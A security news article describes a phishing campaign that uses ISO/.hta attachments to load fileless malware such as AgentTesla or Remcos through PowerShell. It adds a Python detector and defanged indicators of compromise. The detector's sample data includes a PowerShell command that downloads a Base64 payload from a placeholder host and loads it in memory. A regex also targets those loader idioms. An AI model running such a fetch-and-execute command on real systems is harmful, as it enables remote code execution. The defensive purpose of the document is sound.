Beware of New Fileless Malware that Propagates Through Spam Mail
Recent reports suggest that threat actors are using mature phishing emails to distribute fileless malware. The attachment contains a .hta (HTML Application) file, which can also be used to deploy other malware such as AgentTesla, Remcos, and LimeRAT.
This fileless malware is a Portable Executable (PE) that is executed without the file ever being written to the victim's machine. The phishing email body claims to be a bank transfer notice. Alongside that text, the email carries an attachment: an ISO image with an embedded .hta script file. This file runs via mshta.exe (Microsoft HTML Application host).
Fileless Malware Via Spam Mail
As per reports shared with Cyber Security News, when the victim opens this ISO file, the embedded .hta file is executed, creating a process tree that contains mshta.exe, cmd.exe, powershell.exe, and RegAsm.exe, in that order.
The mshta.exe process executes a PowerShell command. The command includes arguments that request a Base64-encoded string from the server (DownloadString), which is then loaded into the current AppDomain (CurrentDomain.Load) so that a function in it can be called. No binary is ever written to disk as a PE file; instead, the binary executes inside the memory space of PowerShell.
In addition, the PowerShell script also executes a DLL decoded from a Base64 string. This DLL downloads the final binary from the C2 server and injects it into RegAsm.exe (Assembly Registration Tool). This final binary can be any malware such as Remcos, AgentTesla, or LimeRAT.
A full report has been published by AhnLab, which gives detailed information about the malware, the PE file, the DLL file, and more.
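As an added example (not code from the article or from AhnLab), the following Python detector applies the two observations above, the mshta > cmd > powershell > RegAsm process lineage and the DownloadString / FromBase64String / Assembly Load arguments, to constructed process-creation events; the sample events, field names and the PLACEHOLDER URL are assumptions, not telemetry from the report.

```python
"""Flag the mshta -> cmd -> powershell -> RegAsm lineage and in-memory
loader arguments in process-creation telemetry (constructed sample events)."""
import re

# Constructed sample events in a Sysmon Event ID 1-like shape. Not real data.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": r'mshta.exe "D:\invoice.hta"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": "cmd.exe /c powershell -w hidden -c ..."},
    {"pid": 400, "ppid": 300, "image": PS,
     "cmd": "powershell.exe -w hidden -c \"$d=(New-Object Net.WebClient)"
            ".DownloadString('http://PLACEHOLDER/x.txt');"  # placeholder URL
            "[System.Reflection.Assembly]::Load([Convert]::FromBase64String($d))\""},
    {"pid": 500, "ppid": 400,
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", "cmd": "RegAsm.exe"},
    {"pid": 600, "ppid": 100, "image": PS, "cmd": "powershell.exe Get-Process"},  # benign
]

# Ancestor sequence described in the article, innermost process last.
CHAIN = ["mshta.exe", "cmd.exe", "powershell.exe", "regasm.exe"]
# Loader idioms from the article: remote fetch, Base64 decode, in-memory assembly load.
LOADER_RE = re.compile(r"downloadstring|frombase64string|assembly\]::load|\.load\(", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(pid, by_pid):
    """Image basenames from the root ancestor down to pid (cycle-safe)."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return list(reversed(chain))


def detect(events):
    """Return (pid, reason) findings for lineage and loader-argument matches."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name = basename(e["image"])
        if name == CHAIN[-1] and ancestry(e["pid"], by_pid)[-len(CHAIN):] == CHAIN:
            findings.append((e["pid"], "mshta>cmd>powershell>regasm chain"))
        # Two or more loader idioms in one PowerShell command line is the signal.
        if name == "powershell.exe" and len(LOADER_RE.findall(e["cmd"])) >= 2:
            findings.append((e["pid"], "in-memory loader arguments"))
    return findings
```

Run `detect(EVENTS)` to see both the RegAsm lineage and the PowerShell loader command flagged, while the benign Get-Process invocation is not.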
Indicators of Compromise
Behavior Detection
Connection/EDR.Behavior.M2650
Execution/MDP.Powershell.M10668
File Detection
Downloader/Script.Generic
Trojan/Win.Generic.R526355
URL & C2
hxxps[:][/][/]cdn[.]pixelbin[.]io[/]v2[/]red-wildflower-1b0af4[/]original[/]hta[.]txt
hxxp[:][/][/]195[.]178[.]120[.]24[/]investorbase64[.]txt
MD5
43e75fb2283765ebacf10135f598e98c (.hta)
540d3bc5982322843934504ad584f370 (.dll)
Source credit: cybersecuritynews.com